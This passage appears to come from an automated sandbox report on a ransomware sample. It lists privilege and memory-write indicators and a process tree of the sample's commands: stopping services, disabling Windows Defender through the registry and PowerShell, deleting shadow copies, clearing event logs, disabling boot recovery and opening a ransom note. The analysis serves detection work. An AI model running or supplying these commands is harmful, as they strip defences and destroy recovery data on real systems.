SeSystemtimePrivilege 2032 wmic.exe Token: SeProfSingleProcessPrivilege 2032 wmic.exe Token: SeIncBasePriorityPrivilege 2032 wmic.exe Token: SeCreatePagefilePrivilege 2032 wmic.exe Token: SeBackupPrivilege 2032 wmic.exe Token: SeRestorePrivilege 2032 wmic.exe Token: SeShutdownPrivilege 2032 wmic.exe Token: SeDebugPrivilege 2032 wmic.exe Token: SeSystemEnvironmentPrivilege 2032 wmic.exe Token: SeRemoteShutdownPrivilege 2032 wmic.exe Token: SeUndockPrivilege 2032 wmic.exe Token: SeManageVolumePrivilege 2032 wmic.exe Token: 33 2032 wmic.exe Token: 34 2032 wmic.exe Token: 35 2032 wmic.exe Token: SeIncreaseQuotaPrivilege 2032 wmic.exe Token: SeSecurityPrivilege 2032 wmic.exe Token: SeTakeOwnershipPrivilege 2032 wmic.exe Token: SeLoadDriverPrivilege 2032 wmic.exe Token: SeSystemProfilePrivilege 2032 wmic.exe Token: SeSystemtimePrivilege 2032 wmic.exe Token: SeProfSingleProcessPrivilege 2032 wmic.exe Token: SeIncBasePriorityPrivilege 2032 wmic.exe Token: SeCreatePagefilePrivilege 2032 wmic.exe Token: SeBackupPrivilege 2032 wmic.exe Token: SeRestorePrivilege 2032 wmic.exe Token: SeShutdownPrivilege 2032 wmic.exe Token: SeDebugPrivilege 2032 wmic.exe Token: SeSystemEnvironmentPrivilege 2032 wmic.exe Token: SeRemoteShutdownPrivilege 2032 wmic.exe Token: SeUndockPrivilege 2032 wmic.exe Token: SeManageVolumePrivilege 2032 wmic.exe Token: 33 2032 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1520 wrote to memory of 1644 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 27 PID 1520 wrote to memory of 1644 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 27 PID 1520 wrote to memory of 1644 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 27 PID 1644 wrote to memory of 1084 1644 net.exe 29 PID 1644 wrote to memory of 1084 1644 net.exe 29 PID 1644 wrote to memory of 1084 1644 net.exe 29 PID 1520 wrote to memory of 1772 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 30 PID 1520 wrote to memory of 1772 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 30 PID 1520 wrote to memory of 1772 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 30 PID 1772 wrote to memory of 1876 1772 net.exe 32 PID 1772 wrote to memory of 1876 1772 net.exe 32 PID 1772 wrote to memory of 1876 1772 net.exe 32 PID 1520 wrote to memory of 1816 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 33 PID 1520 wrote to memory of 1816 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 33 PID 1520 wrote to memory of 1816 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 33 PID 1816 wrote to memory of 1196 1816 net.exe 35 PID 1816 wrote to memory of 1196 1816 net.exe 35 PID 1816 wrote to memory of 1196 1816 net.exe 35 PID 1520 wrote to memory of 756 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 36 PID 1520 wrote to memory of 756 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 36 PID 1520 wrote to memory of 756 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 36 PID 756 wrote to memory of 1884 756 net.exe 38 PID 756 wrote to memory of 1884 756 net.exe 38 PID 756 wrote to memory of 1884 756 net.exe 38 PID 1520 wrote to memory of 1568 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 39 PID 1520 wrote to memory of 1568 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 39 PID 1520 wrote to memory of 1568 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 39 PID 1568 wrote to memory of 1780 1568 net.exe 41 PID 1568 wrote to memory of 1780 1568 net.exe 41 PID 1568 wrote to memory of 1780 1568 net.exe 41 PID 1520 wrote to memory of 2004 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 42 PID 1520 wrote to memory of 2004 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 42 PID 1520 wrote to memory of 2004 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 42 PID 2004 wrote to memory of 1984 2004 net.exe 44 PID 2004 wrote to memory of 1984 2004 net.exe 44 PID 2004 wrote to memory of 1984 2004 net.exe 44 PID 1520 wrote to memory of 1972 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 45 PID 1520 wrote to memory of 1972 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 45 PID 1520 wrote to memory of 1972 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 45 PID 1972 wrote to memory of 1056 1972 net.exe 47 PID 1972 wrote to memory of 1056 1972 net.exe 47 PID 1972 wrote to memory of 1056 1972 net.exe 47 PID 1520 wrote to memory of 1996 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 48 PID 1520 wrote to memory of 1996 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 48 PID 1520 wrote to memory of 1996 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 48 PID 1996 wrote to memory of 1740 1996 net.exe 50 PID 1996 wrote to memory of 1740 1996 net.exe 50 PID 1996 wrote to memory of 1740 1996 net.exe 50 PID 1520 wrote to memory of 1160 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 51 PID 1520 wrote to memory of 1160 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 51 PID 1520 wrote to memory of 1160 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 51 PID 1520 wrote to memory of 884 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 53 PID 1520 wrote to memory of 884 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 53 PID 1520 wrote to memory of 884 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 53 PID 1520 wrote to memory of 1172 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 56 PID 1520 wrote to memory of 1172 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 56 PID 1520 wrote to memory of 1172 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 56 PID 1520 wrote to memory of 1376 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 58 PID 1520 wrote to memory of 1376 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 58 PID 1520 wrote to memory of 1376 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 58 PID 1520 wrote to memory of 576 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 61 PID 1520 wrote to memory of 576 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 61 PID 1520 wrote to memory of 576 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 61 PID 1520 wrote to memory of 868 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe 63
Processes
-
C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe"C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1084
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1876
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1196
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1884
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1780
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1984
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1056
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1740
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1160
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:884
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1172
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1376
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:576
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:868
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1756
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1636
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1316
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1592
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1092
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1920
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1192
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1344
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1912
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1980
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1964
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1864
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1528
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1672
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:112
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:904
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1480
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:916
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:968
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1600
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1628
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1604
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1800
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1956
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1992
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1692
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1748
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:964
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:272
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1596
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:820
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1216
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1068
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1140
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:292
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1620
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:520
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2068
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2088
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2108
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2128
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2160
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2260
-
-
-
C:\Windows\system32\notepad.exenotepad.exe C:\xG7b_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2596
-
-
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe"2⤵PID:2604
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2628
-
-